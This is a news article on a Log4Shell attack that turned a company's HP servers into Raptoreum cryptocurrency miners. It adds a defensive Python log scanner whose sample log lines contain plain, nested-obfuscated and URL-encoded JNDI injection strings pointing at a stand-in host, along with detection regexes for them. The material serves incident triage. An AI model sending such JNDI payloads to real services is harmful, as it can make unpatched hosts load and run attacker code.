- Hackers gained control of HP servers belonging to an undisclosed company and repurposed the hardware to mine cryptocurrency.
- Raptoreum, a top 1000 coin by market cap, was determined to be the coin the hackers would use.
- On December 9, the compromised servers began mining Raptoreum, and at the time their hash power was superior to that of every other party on the network.
An undisclosed company had a group of its HP servers compromised by attackers who took control of the hardware and repurposed it to mine cryptocurrency. The attackers chose to mine Raptoreum, a coin among the top 1,000 by market cap, which uses an algorithm called Ghostrider, a blend of proof-of-work (PoW) and proof-of-stake (PoS) consensus mechanisms.
Mining of Raptoreum began on December 9, and at that time the server group's hash power was superior to that of every other party on the Raptoreum blockchain. Between December 9 and December 17, the attackers scooped up over $110,000 in Raptoreum.
On December 17, the server group disappeared from Raptoreum's network, indicating that it was patched to eliminate the threat as soon as it was discovered.
The attack exploited a vulnerability known as Log4Shell, which allows attackers to gain remote control over affected systems. Log4Shell affects Log4j, a widely used Apache logging library. The vulnerability was discovered early in December, and in this case an attacker used it to execute crypto-mining software.
Because the library is so widely used, even in massive organizations like Microsoft and IBM, its discoverers categorized the vulnerability as critical. Researchers are still finding new ways to exploit the software even after some of its implementations have been patched. Recently, it was discovered that the software can also be exploited in local attacks, in which servers execute code while not connected to the internet.
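For defenders triaging whether a host was probed with Log4Shell, the first place to look is the web-server access logs, since the lookup string has to arrive in some logged field (User-Agent, headers, URL). The following is an added example, not code from the article or from any party it describes: a small Python log scanner that URL-decodes each line, collapses the common `${lower:...}` / `${upper:...}` / `${::-...}` nesting tricks used to disguise the lookup, and flags lines containing a `${jndi:...}` pattern. The log lines are constructed for illustration and do not come from the incident in the article; the function names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article's incident).
# Lines 1-3 carry a JNDI lookup in the User-Agent field, each disguised differently.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:13 +0000] "GET /login HTTP/1.1" 200 88 "-" "%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fc%7D"',
    '10.0.0.7 - - [10/Dec/2021:03:14:15 +0000] "GET /about HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
]

# A single-character lookup used only to hide a letter:
#   ${lower:j}, ${upper:J}, ${::-j}  ->  j
NESTED_LOOKUP = re.compile(r"\$\{\s*(?:(?:lower|upper)\s*:|::-)\s*([^}]*)\}", re.IGNORECASE)

# The actual lookup prefix that Log4Shell abuses.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo the cheap obfuscations seen in the wild before pattern matching."""
    text = line
    # Percent-decode repeatedly; stop when decoding no longer changes anything.
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Collapse nested lookups from the inside out until the text is stable.
    previous = None
    while previous != text:
        previous = text
        text = NESTED_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def is_suspicious(line: str) -> bool:
    """True if the (normalized) line contains a JNDI lookup expression."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def find_suspicious(lines) -> list:
    """Return the indices of log lines that should be reviewed."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]


if __name__ == "__main__":
    for idx in find_suspicious(SAMPLE_LOG):
        print(f"line {idx}: {SAMPLE_LOG[idx]}")
```

A hit in the logs means the host was probed, not necessarily that the lookup was resolved; the follow-up is to check whether the application actually ran a vulnerable Log4j version and whether the host made unexpected outbound connections around that timestamp. Patching Log4j remains the fix; the scanner only helps decide where to look first.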
Reports released by Unit 42, a security consulting firm, show that crypto-jacking attacks decreased for the first time since 2018, according to its "Cloud Threat Report" for the first half of 2019. In a follow-up report, the firm revealed that 63% of the third-party code templates used to build cloud infrastructure contained insecure configurations that could lead to losing control over the hardware.